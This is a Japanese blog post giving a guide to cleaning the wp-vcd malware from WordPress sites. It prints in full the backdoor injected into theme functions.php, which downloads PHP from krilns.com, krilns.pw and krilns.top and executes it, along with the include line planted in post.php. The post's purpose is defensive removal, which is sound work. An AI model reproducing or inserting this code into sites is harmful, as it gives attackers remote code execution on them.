• Home
  • Web関連HOT
  • マーケティングHOT
  • ポーランドPopular
  • リトアニアPopular
  • カナダPopular
  • イギリスPopular
  • マラウイPopular
  • イスラエルPopular
  • エストニア
  • ノルウエー
  • ハンガリー
  • ブルガリア
  • トルコ
  • ラトビア
  • チェコ
  • フィンランド
  • エチオピア
  • カンボジア
  • タイ
  • ベトナム
  • マレーシア
  • カタール
  • コロンビア
  • 旅全般
WEB × マーケティング × 海外 × 英語
2022年6月28日 火曜日
⚡️旅人ほだ
  • HOME
  • Web関連
  • カナダ
  • ポーランド
  • バルト三国
    • リトアニア
    • ラトビア
    • エストニア
  • ノルウエー
  • アジア
    • タイ
    • カンボジア
    • マレーシア
    • 中国
    • 日本
  • マラウイ
  • トルコ
  • その他
    • 今日の名言
    • 考えていること
    • Web関連
    • 旅に役立つ
No Result
View All Result
⚡️旅人ほだ
  • HOME
  • Web関連
  • カナダ
  • ポーランド
  • バルト三国
    • リトアニア
    • ラトビア
    • エストニア
  • ノルウエー
  • アジア
    • タイ
    • カンボジア
    • マレーシア
    • 中国
    • 日本
  • マラウイ
  • トルコ
  • その他
    • 今日の名言
    • 考えていること
    • Web関連
    • 旅に役立つ
No Result
View All Result
⚡️旅人ほだ
No Result
View All Result
Home Web関連

WordPressのマルウエアを削除する方法 完全ガイド (wp-vcd.phpなど)

旅人ほだ by 旅人ほだ
2019年12月24日 - 最終更新日 2020年1月20日
3.1k
VIEWS
FacebookでシェアTwitterでシェア

こんにちは。

今回の記事ではWordPressがマルウェアに感染してしまった時の対処方をご説明します。

 

目次

  • 1 まずはスキャン
  • 2 主な原因
  • 3 サーバー内の他のサイトも確認して下さい

まずはスキャン

とにもかくにも、まずは原因を突き止める必要があります。そのために、「Wordfence」という無料プラグインをインストールして有効化します。

Wordfence Security – Firewall & Malware Scan

 

関連記事

【解説】ドライブCの容量を増やす方法が想像以上に簡単だった

Paypalで支払いエラーが表示される場合の解決方法

(Windows11) PDFドキュメントのサイズの確認方法

トリップワイヤーファネルを作成する方法と効果的な理由

もっと読み込む

 

 

そして「Wordfence」>「Scan」に進みます。「START NEW SCAN」をクリックしていスキャンを行います。

 

スキャンには時間がかかりますが、完了すると問題のある部分のリストが表示されます。

この中で「Critical」という項目は必ず修正する必要があります。

 

主な原因

原因はいくつかありますが、基本的に以下の部分が問題になることが多いです。

 

① wp-vcd.phpの削除

マルウェアにおいて1番よくあるのがこちらのファイルを追加されていることです。

FTPでアクセスして、 wp-includes/wp-vcd.php にインストールされたこのファイルを削除する必要があります。

 

② wp-feed.php の削除

同時に wp-includes/wp-feed.php に 勝手にファイルを作成されていることがあるので「wp-feed.php」も削除します。

 

③ テーマ内の functions.php の修正

↑このような表示があるので、テーマ内のfunctions.php のファイルを修正します。この警告が出ていれば、functions.php 内の先頭に以下のコードが挿入されていることが多いので確認してから削除をしましょう。

 

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '94d7c9be1abb7310b4c554fc3bfc8528'))
	{
$div_code_name="wp_vcd";
		switch ($_REQUEST['action'])
			{

				




				case 'change_domain';
					if (isset($_REQUEST['newdomain']))
						{
							
							if (!empty($_REQUEST['newdomain']))
								{
                                                                           if ($file = @file_get_contents(__FILE__))
		                                                                    {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                             {

			                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
			                                                                           @file_put_contents(__FILE__, $file);
									                           print "true";
                                                                                                             }


		                                                                    }
								}
						}
				break;

								case 'change_code';
					if (isset($_REQUEST['newcode']))
						{
							
							if (!empty($_REQUEST['newcode']))
								{
                                                                           if ($file = @file_get_contents(__FILE__))
		                                                                    {
                                                                                                 if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                             {

			                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
			                                                                           @file_put_contents(__FILE__, $file);
									                           print "true";
                                                                                                             }


		                                                                    }
								}
						}
				break;
				
				default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
			}
			
		die("");
	}








$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
           if( fwrite($handle, "<?php\n" . $phpCode))
		   {
		   }
			else
			{
			$tmpfname = tempnam('./', "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
			fwrite($handle, "<?php\n" . $phpCode);
			}
			fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        

$wp_auth_key='bd77cd4ba9fae84678e6f1b5cf9b9665';
        if (($tmpcontent = @file_get_contents("http://www.krilns.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.krilns.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("http://www.krilns.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } 
		
		        elseif ($tmpcontent = @file_get_contents("http://www.krilns.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
		elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
           
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } 
        
        
        
        
        
    }
}

//$start_wp_theme_tmp



//wp_tmp


//$end_wp_theme_tmp
?>

 

慣れない場合は自分でやるのはオススメできません。間違ってfunctions.phpファイルの中身を消してしまうとサイトが表示されなくなってしまいます。

もしヘルプが必要ということでしたら僕の方でも対応できるので、お問い合わせフォームからご連絡いただければと思います。

また、1つのテーマにこの警告が見つかったら、他のテーマの functions.php にも感染していることが多いです。必ず確認しましょう。また、使っていないテーマがあればこの際に削除してしまってもいいです。

 

↑テーマの functions.php のこの部分から上を削除します。

 

④ post.php の修正

以下のように post.php ファイルにも「Critical」という警告が出ますが、削除をしてはいけません。こちらもファイル内を修正する必要があります。

FTPで wp-includes/post.php にアクセスをして、以下の部分を削除します。こちらも基本的には先頭に追加されています。

<?php if (file_exists(dirname(__FILE__) . '/wp-vcd.php')) include_once(dirname(__FILE__) . '/wp-vcd.php'); ?>

 

 

 

⑤ その他ファイルの修正

その他に「Critical」が表示されている部分は必ず修正する必要があります。

その以下は例になります。こちらが表示されていたら、該当するファイルを開いて、指定された箇所を削除します。こちらも慣れない場合は自分でやらない方がいいです。

 

 

サーバー内の他のサイトも確認して下さい

このようにマルウエアが確認されたら、同じサーバーの他のWordPressのサイトも感染していることが多いです。ですので、必ず他のサイトも確認するようにしましょう。

  • 公式サイトからダウンロードしていない海賊版のテーマ・プラグインを使用している
  • アカウント情報(ユーザー名・パスワード)が簡単すぎる
  • WordPressの公式サイトから削除されたプラグインを使用している
  • WordPressのバージョンが古い

↑できるだけこの項目に気をつけるようにしましょう。

 

Wordfenceのプラグインを使って、定期的にスキャンをするようにしましょう。

 

Tags: malwaremalware crushermalware crusher アンインストールmalware crusher アンインストールできないmalware crusherとはmalwarebites.commalwareblacklistmalwarebotmalwarebytes 日本語malwarebyts.org
シェアTweetスキャン
旅人ほだ

旅人ほだ

ITフリーランス / WordPressエキスパート / 海外クラウドサービス導入 / IT翻訳 / 動画制作 / SEOマーケティング / アプリ開発 / 写真家 / WEBメディア多数運営

海外在住:3カ国 (ポーランド、カナダ、リトアニア)
海外渡航:約30カ国

貴重なお時間をこのブログに割いていただきありがとうございます! 海外を中心に生活をしており、IT系のフリーランスをしています。ノマドとして生活をして海外で大学生をしたり、ボランティアをしたり自由に生きています。
英語/ポーランド語が話せます。

関連記事

【解説】ドライブCの容量を増やす方法が想像以上に簡単だった
Web関連

【解説】ドライブCの容量を増やす方法が想像以上に簡単だった

2022年6月26日
paypal-earnings
Web関連

Paypalで支払いエラーが表示される場合の解決方法

2022年6月20日 - 最終更新日 2022年6月24日
(Windows11) PDFドキュメントのサイズの確認方法
Web関連

(Windows11) PDFドキュメントのサイズの確認方法

2022年4月29日 - 最終更新日 2022年6月17日
トリップワイヤーファネルを作成する方法と効果的な理由
Web関連

トリップワイヤーファネルを作成する方法と効果的な理由

2022年3月31日 - 最終更新日 2022年6月20日
テキストベースメール vs HTMLメールのメリット・デメリット
マーケティング

テキストベースメール vs HTMLメールのメリット・デメリット

2022年3月28日 - 最終更新日 2022年6月21日
オンライン講座の動画撮影に最適「Loom」の使い方/インストール方法
Web関連

オンライン講座の動画撮影に最適「Loom」の使い方/インストール方法

2022年3月11日 - 最終更新日 2022年6月23日

最新記事

【解説】ドライブCの容量を増やす方法が想像以上に簡単だった

【解説】ドライブCの容量を増やす方法が想像以上に簡単だった

[超簡単]UFJ銀行の英文残高証明書発行がアプリからできるようになりました!

[超簡単]UFJ銀行の英文残高証明書発行がアプリからできるようになりました!

2022/06/21 - 最終更新日 2022/06/25
paypal-earnings

Paypalで支払いエラーが表示される場合の解決方法

2022/06/20 - 最終更新日 2022/06/24
(Windows11) PDFドキュメントのサイズの確認方法

(Windows11) PDFドキュメントのサイズの確認方法

2022/04/29 - 最終更新日 2022/06/17
トリップワイヤーファネルを作成する方法と効果的な理由

トリップワイヤーファネルを作成する方法と効果的な理由

2022/03/31 - 最終更新日 2022/06/20
テキストベースメール vs HTMLメールのメリット・デメリット

テキストベースメール vs HTMLメールのメリット・デメリット

2022/03/28 - 最終更新日 2022/06/21
メールがGmailの「プロモーション」に行ってしまう理由とその解決方法10個

メールがGmailの「プロモーション」に行ってしまう理由とその解決方法10個

2022/03/25 - 最終更新日 2022/06/22
オンライン講座の動画撮影に最適「Loom」の使い方/インストール方法

オンライン講座の動画撮影に最適「Loom」の使い方/インストール方法

もっと読み込む

最新更新した記事

【解説】ドライブCの容量を増やす方法が想像以上に簡単だった
Web関連

【解説】ドライブCの容量を増やす方法が想像以上に簡単だった

[超簡単]UFJ銀行の英文残高証明書発行がアプリからできるようになりました!
その他

[超簡単]UFJ銀行の英文残高証明書発行がアプリからできるようになりました!

2022年6月21日 - 最終更新日 2022年6月25日
paypal-earnings
Web関連

Paypalで支払いエラーが表示される場合の解決方法

2022年6月20日 - 最終更新日 2022年6月24日
MacInCloudの使い方 Widondows PCしかなくてもiOSアプリを開発する方法![Xcode]
Web関連

MacInCloudの使い方 Widondows PCしかなくてもiOSアプリを開発する方法![Xcode]

北海道の神威岬に行ってきました!これは行くべき!
日本

北海道の神威岬に行ってきました!これは行くべき!

コロンビアでのSIMカード(インターネット)の使い方
コロンビア

コロンビアでのSIMカード(インターネット)の使い方

【お願い】ポーランドのよさこいチームを支援してください!
日本

【お願い】ポーランドのよさこいチームを支援してください!

2017年8月29日 - 最終更新日 2022年6月24日
[ご支援ありがとうございます]よさこいクラウドファンディング成功しました!
その他

[ご支援ありがとうございます]よさこいクラウドファンディング成功しました!

2017年10月13日 - 最終更新日 2022年6月24日
桜舞ポーランド・ワルシャワチーム紹介動画
その他

桜舞ポーランド・ワルシャワチーム紹介動画

2017年10月28日 - 最終更新日 2022年6月24日
[お願い]”日本ポーランド学生会議”のクラウドファンディングを支援して下さい!
日本

[お願い]”日本ポーランド学生会議”のクラウドファンディングを支援して下さい!

2018年5月10日 - 最終更新日 2022年6月24日
もっと読み込む

ADS


PR

旅人、起業家、アプリ開発者、WEBデザイナー、サイト翻訳家、動画製作者、WEBコンサルタントなどなどとして活動しています「旅人ほだ」の公式サイトです。

色んなスキルを駆使して色んなことをしています。最近は仕事が楽しすぎてブログの方が疎かになっていますが、時間を見つけて更新していこうと思います!

【解説】ドライブCの容量を増やす方法が想像以上に簡単だった

【解説】ドライブCの容量を増やす方法が想像以上に簡単だった

2022年6月26日
[超簡単]UFJ銀行の英文残高証明書発行がアプリからできるようになりました!

[超簡単]UFJ銀行の英文残高証明書発行がアプリからできるようになりました!

2022年6月21日 - 最終更新日 2022年6月25日
paypal-earnings

Paypalで支払いエラーが表示される場合の解決方法

2022年6月20日 - 最終更新日 2022年6月24日
(Windows11) PDFドキュメントのサイズの確認方法

(Windows11) PDFドキュメントのサイズの確認方法

2022年4月29日 - 最終更新日 2022年6月17日
トリップワイヤーファネルを作成する方法と効果的な理由

トリップワイヤーファネルを作成する方法と効果的な理由

2022年3月31日 - 最終更新日 2022年6月20日
  • Facebook
  • twitter
  • Youtube
  • instagram

© 2022 旅人ほだ

No Result
View All Result
  • ポーランド
  • リトアニア
  • カナダ
  • イギリス
  • マラウイ
  • イスラエル
  • エストニア
  • ノルウエー
  • ハンガリー
  • ブルガリア
  • トルコ
  • ラトビア
  • チェコ
  • フィンランド
  • エチオピア
  • カンボジア
  • タイ
  • ベトナム
  • マレーシア
  • カタール
  • コロンビア
  • 旅全般

© 2022 旅人ほだ